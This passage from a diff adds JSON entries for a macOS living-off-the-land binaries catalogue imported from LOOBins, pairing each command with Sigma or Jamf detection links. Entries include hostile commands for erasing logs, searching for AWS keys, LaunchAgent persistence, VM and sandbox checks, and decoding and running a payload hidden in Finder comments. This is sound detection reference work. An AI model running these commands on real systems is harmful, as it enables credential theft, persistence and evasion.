"availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Disk Image Mounting Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" + }, + { + "type": "Sigma: Disk Image Creation Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", + "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" + ] + }, + { + "id": "loobins:hdiutil:3abba42650076ac3", + "toolId": "loobins:hdiutil", + "toolName": "hdiutil", + "name": "Exfiltrate data in encrypted dmg file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection" + ], + "nativeCategory": [ + "Collection" + ], + "command": "hdiutil create -encryption -stdinpass -volname \"Volume Name\" -srcfolder /path/to/folder -ov encrypteddiskimage.dmg", + "description": "Uses hdiutil to create a dmg file to store exfiltrate data", + "mitre": [], + "fullPath": [ + "/usr/bin/hdiutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Disk Image Mounting Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" + }, + { + "type": "Sigma: Disk Image Creation Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", + "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" + ] + }, + { + "id": "loobins:ioreg:dcc33326372b51d5", + "toolId": "loobins:ioreg", + "toolName": "ioreg", + "name": "Use ioreg to check whether the remote macOS screen is locked.", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "ioreg -n Root -d1 -a | grep CGSSession", + "description": "The following command will display a list of keys that contain \"CGSSession\". If the key \"CGSSessionScreenIsLocked\" is present, the screen is actively locked.", + "mitre": [], + "fullPath": [ + "/usr/sbin/ioreg" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Information Discovery Using Ioreg", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" + }, + { + "type": "Jamf Protect: Ioreg used to detect if the screen is locked", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml", + "https://evasions.checkpoint.com/src/MacOS/macos.html", + "https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520" + ] + }, + { + "id": "loobins:ioreg:b067f0c68c730682", + "toolId": "loobins:ioreg", + "toolName": "ioreg", + "name": "Use ioreg to check whether the host is on a physical machine or a VM", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery", + "Collection" + ], + "nativeCategory": [ + "Discovery", + "Collection" + ], + "command": "ioreg -rd1 -c IOPlatformExpertDevice", + "description": "Check the output of this command (specifically the IOPlatformSerialNumber, board-id, and manufacturer fields) to check whether or not this host is in a virtual machine.", + "mitre": [], + "fullPath": [ + "/usr/sbin/ioreg" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Information Discovery Using Ioreg", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" + }, + { + "type": "Jamf Protect: Ioreg used to detect if the screen is locked", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml", + "https://evasions.checkpoint.com/src/MacOS/macos.html", + "https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520" + ] + }, + { + "id": "loobins:ioreg:cd37720e15a402b9", + "toolId": "loobins:ioreg", + "toolName": "ioreg", + "name": "Use ioreg to check USB device vendor names", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery", + "Collection" + ], + "nativeCategory": [ + "Discovery", + "Collection" + ], + "command": "ioreg -rd1 -c IOUSBHostDevice", + "description": "Grep for \"USB Vendor Name\" values to view USB vendor names. On virtualized hardware these values may contain the hypervisor name such as \"VirtualBox\". This is an additional way to check for virtualization.", + "mitre": [], + "fullPath": [ + "/usr/sbin/ioreg" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Information Discovery Using Ioreg", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" + }, + { + "type": "Jamf Protect: Ioreg used to detect if the screen is locked", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml", + "https://evasions.checkpoint.com/src/MacOS/macos.html", + "https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520" + ] + }, + { + "id": "loobins:ioreg:fbb090f474aa6ca4", + "toolId": "loobins:ioreg", + "toolName": "ioreg", + "name": "Check all ioreg properties for hypervisor names.", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery", + "Collection" + ], + "nativeCategory": [ + "Discovery", + "Collection" + ], + "command": "ioreg -l", + "description": "Grep for \"virtual box\", \"oracle\", and \"vmware\" from the output of the ioreg -l command. This is an additional way to check for virtualization.", + "mitre": [], + "fullPath": [ + "/usr/sbin/ioreg" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Information Discovery Using Ioreg", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" + }, + { + "type": "Jamf Protect: Ioreg used to detect if the screen is locked", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml", + "https://evasions.checkpoint.com/src/MacOS/macos.html", + "https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520" + ] + }, + { + "id": "loobins:kextstat:c2c6f26bdef46a47", + "toolId": "loobins:kextstat", + "toolName": "kextstat", + "name": "List kernel extensions", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "kexstat", + "description": "Uses kexstat showloaded to display kernel extensions and address in kernel memory it has been loaded", + "mitre": [], + "fullPath": [ + "/usr/sbin/kextstat" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/kextstat.yml", + "https://ss64.com/osx/kextstat.html" + ] + }, + { + "id": "loobins:last:6dcde1a1bfcae0a2", + "toolId": "loobins:last", + "toolName": "last", + "name": "Enumerate the users who are currently logged into the system.", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "last | grep \"still logged in\"", + "description": "The following command will display sessions that are currently active.", + "mitre": [], + "fullPath": [ + "/usr/bin/last" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Network Connections Discovery", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/last.yml", + "https://ss64.com/osx/last.html" + ] + }, + { + "id": "loobins:last:ed7e3de067377640", + "toolId": "loobins:last", + "toolName": "last", + "name": "Enumerate all user accounts that have logged into the system previously.", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "last -t console", + "description": "The last command can be used to output users who have previously logged in, by specifying the tty interface 'console'.", + "mitre": [], + "fullPath": [ + "/usr/bin/last" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Network Connections Discovery", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/last.yml", + "https://ss64.com/osx/last.html" + ] + }, + { + "id": "loobins:last:5ba5734955e17f30", + "toolId": "loobins:last", + "toolName": "last", + "name": "Enumerate all hosts that have remotely logged into the system before.", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "last | grep -E '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+'", + "description": "An attacker can use 'last' with a filter to retrieve the connection date and remote host information for remote logins.", + "mitre": [], + "fullPath": [ + "/usr/bin/last" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "System Network Connections Discovery", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/last.yml", + "https://ss64.com/osx/last.html" + ] + }, + { + "id": "loobins:launchctl:cab792e5e586c548", + "toolId": "loobins:launchctl", + "toolName": "launchctl", + "name": "Use launchctl to execute an application", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution", + "Persistence" + ], + "nativeCategory": [ + "Execution", + "Persistence" + ], + "command": "sudo launchctl load /Library/LaunchAgent/com.apple.installer", + "description": "A oneliner that will load a plist as a LaunchAgent or LaunchDaemon, achieving persistence on a target machine. This command requires root privileges.", + "mitre": [], + "fullPath": [ + "/bin/launchctl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications.", + "value": "LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications." + }, + { + "type": "Jamf Protect: Detect launchctl activity that unloads or bootsout specific service", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/launchctl_unload_and_bootout_events" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/launchctl.yml", + "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/", + "https://attack.mitre.org/techniques/T1569/001/", + "https://attack.mitre.org/techniques/T1543/001/", + "https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/" + ] + }, + { + "id": "loobins:launchctl:e0168ff2595cd079", + "toolId": "loobins:launchctl", + "toolName": "launchctl", + "name": "Persistent launch agent", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Persistence" + ], + "nativeCategory": [ + "Persistence" + ], + "command": "launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist", + "description": "Creation of a persistent launch agent called with $HOME/Library/LaunchAgents/com.apple.updates.plist", + "mitre": [], + "fullPath": [ + "/bin/launchctl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications.", + "value": "LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications." + }, + { + "type": "Jamf Protect: Detect launchctl activity that unloads or bootsout specific service", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/launchctl_unload_and_bootout_events" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/launchctl.yml", + "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/", + "https://attack.mitre.org/techniques/T1569/001/", + "https://attack.mitre.org/techniques/T1543/001/", + "https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/" + ] + }, + { + "id": "loobins:log:32d51b69b7129486", + "toolId": "loobins:log", + "toolName": "log", + "name": "Remove all log messages", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "log erase --all", + "description": "An attacker can cover up their tracks by removing all log messages using the following command. Requires root privileges.", + "mitre": [], + "fullPath": [ + "/usr/bin/log" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/log.yml", + "https://shellcromancer.io/posts/living-off-of-macos/" + ] + }, + { + "id": "loobins:log:4e78bd2f52cfc999", + "toolId": "loobins:log", + "toolName": "log", + "name": "Search log messages for tokens", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "log show --info --debug --predicate 'eventMessage CONTAINS[d] \"eyJ\"'", + "description": "An attacker can potentially search log messages and review if they do contain sensitive information like jwt tokens.", + "mitre": [], + "fullPath": [ + "/usr/bin/log" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/log.yml", + "https://shellcromancer.io/posts/living-off-of-macos/" + ] + }, + { + "id": "loobins:lsregister:160ac1ed847c10ba", + "toolId": "loobins:lsregister", + "toolName": "lsregister", + "name": "Force an update of the Launch Services database", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -f", + "description": "The -f flag can be used to force an update of the Launch Services database. This can be used to quickly register a custom URL scheme that points to a malicious app.", + "mitre": [], + "fullPath": [ + "/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/lsregister.yml", + "https://www.jamf.com/blog/remote-mac-exploitation-via-custom-url-schemes/", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation" + ] + }, + { + "id": "loobins:lsregister:352322721f01970b", + "toolId": "loobins:lsregister", + "toolName": "lsregister", + "name": "Get a list of apps and their bindings", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -E \"path:|bindings:|name: | more\"", + "description": "The -dump flag can be used to get a list of apps and their bindings", + "mitre": [], + "fullPath": [ + "/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/lsregister.yml", + "https://www.jamf.com/blog/remote-mac-exploitation-via-custom-url-schemes/", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation" + ] + }, + { + "id": "loobins:lsregister:4e2159119984afaf", + "toolId": "loobins:lsregister", + "toolName": "lsregister", + "name": "Delete the Launch Services database", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Impact" + ], + "command": "lsregister -delete", + "description": "The -delete flag can be used to delete the Launch Services database to impact normal operation of the system.", + "mitre": [], + "fullPath": [ + "/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/lsregister.yml", + "https://www.jamf.com/blog/remote-mac-exploitation-via-custom-url-schemes/", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation" + ] + }, + { + "id": "loobins:mdfind:c996ea826308e08e", + "toolId": "loobins:mdfind", + "toolName": "mdfind", + "name": "Use mdfind to provide live updates to the number of files matching the query", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Reconnaissance", + "Discovery" + ], + "command": "mdfind -live passw", + "description": "A bash or zsh oneliner can cause mdfind to provide an attacker with live updates to the number of files on a system.", + "mitre": [], + "fullPath": [ + "/usr/bin/mdfind" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect activity related to mdfind used to search for stored AWS keys", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/mdfind_search_aws_keys" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdfind.yml", + "https://youtu.be/Snwh4mMe-Cg?t=45", + "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/" + ] + }, + { + "id": "loobins:mdfind:2db1dd9877d58c35", + "toolId": "loobins:mdfind", + "toolName": "mdfind", + "name": "Use mdfind to search for AWS Keys", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Reconnaissance", + "Discovery" + ], + "command": "mdfind 'kMDItemTextContext == AKIA || kMDItemDisplayName = *AKIA* -onlyin ~'", + "description": "Allows an attacker to query the filesystem via the CommandLine/Terminal to search for AWS keys.", + "mitre": [], + "fullPath": [ + "/usr/bin/mdfind" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect activity related to mdfind used to search for stored AWS keys", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/mdfind_search_aws_keys" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdfind.yml", + "https://youtu.be/Snwh4mMe-Cg?t=45", + "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/" + ] + }, + { + "id": "loobins:mdfind:8bd2fd8338c96e64", + "toolId": "loobins:mdfind", + "toolName": "mdfind", + "name": "Use mdfind to search for apps to infect", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery", + "Defense Evasion" + ], + "nativeCategory": [ + "Reconnaissance", + "Discovery", + "Defense Evasion" + ], + "command": "set appId to do shell script \"mdfind kMDItemCFBundleIdentifier = '\" & bundleId & \"'\"", + "description": "Allows an attacker to determine if specific applications are installed and can be leveraged", + "mitre": [], + "fullPath": [ + "/usr/bin/mdfind" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect activity related to mdfind used to search for stored AWS keys", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/mdfind_search_aws_keys" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdfind.yml", + "https://youtu.be/Snwh4mMe-Cg?t=45", + "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/" + ] + }, + { + "id": "loobins:mdls:097a7a7a4f0a3991", + "toolId": "loobins:mdls", + "toolName": "mdls", + "name": "Validate file download information", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "mdls -name \"kMDItemWhereFroms\" -name \"kMDItemDownloadedDate\"", + "description": "Use mdls to validate payload download sources and timestamps to guard against sandbox executions.", + "mitre": [], + "fullPath": [ + "/usr/bin/mdls" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdls.yml", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:mdls:518fce6d16797638", + "toolId": "loobins:mdls", + "toolName": "mdls", + "name": "Query File Paths", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "xargs -0 mdls -n kMDItemPath -n kMDItemFSSize", + "description": "Use mdls to print file paths and sizes when enumerating host resources.", + "mitre": [], + "fullPath": [ + "/usr/bin/mdls" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdls.yml", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:mdls:c7bc602e81ff2077", + "toolId": "loobins:mdls", + "toolName": "mdls", + "name": "Extract and execute payload stored in Finder comment metadata", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution", + "Collection", + "Defense Evasion" + ], + "nativeCategory": [ + "Execution", + "Collection", + "Defense Evasion" + ], + "command": "mdls -name kMDItemFinderComment -raw ~/Desktop/payload_carrier.txt | base64 -D | bash", + "description": "Every file on macOS has a Finder comment field stored as Spotlight metadata under the kMDItemFinderComment attribute. mdls can read this field and pipe its contents to a decoder and executor. Because the payload lives entirely in Spotlight metadata rather than file contents, it is not visible to file-based inspection or integrity monitoring tools. Finder comments can be written remotely via osascript over Remote Apple Events or SSH, making this a covert staging mechanism for lateral movement payloads.", + "mitre": [], + "fullPath": [ + "/usr/bin/mdls" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdls.yml", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:mktemp:8ae26ff6d9e798ad", + "toolId": "loobins:mktemp", + "toolName": "mktemp", + "name": "Generate payload directory (Shlayer)", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "export tmpDir=\"$(mktemp -d /tmp/XXXXXXXXXXXX)\"", + "description": "The following command can be used to generate a random directory name for staging payloads", + "mitre": [], + "fullPath": [ + "/usr/bin/mktemp" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mktemp.yml", + "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/", + "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/" + ] + }, + { + "id": "loobins:mktemp:adcbf3c728bcf6f7", + "toolId": "loobins:mktemp", + "toolName": "mktemp", + "name": "Generate directory based on template file (Bundlore)", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion" + ], + "command": "TMP_DIR=\"mktemp -d -t x\"", + "description": "The following command can be used to generate a unique directory based on a template", + "mitre": [], + "fullPath": [ + "/usr/bin/mktemp" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mktemp.yml", + "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/", + "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/" + ] + }, + { + "id": "loobins:networksetup:41bd049d11be4aa4", + "toolId": "loobins:networksetup", + "toolName": "networksetup", + "name": "network device enumeration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "networksetup -listnetworkserviceorder", + "description": "Use networksetup to display services with corresponding port and device in order they are tried for connecting to a network.", + "mitre": [], + "fullPath": [ + 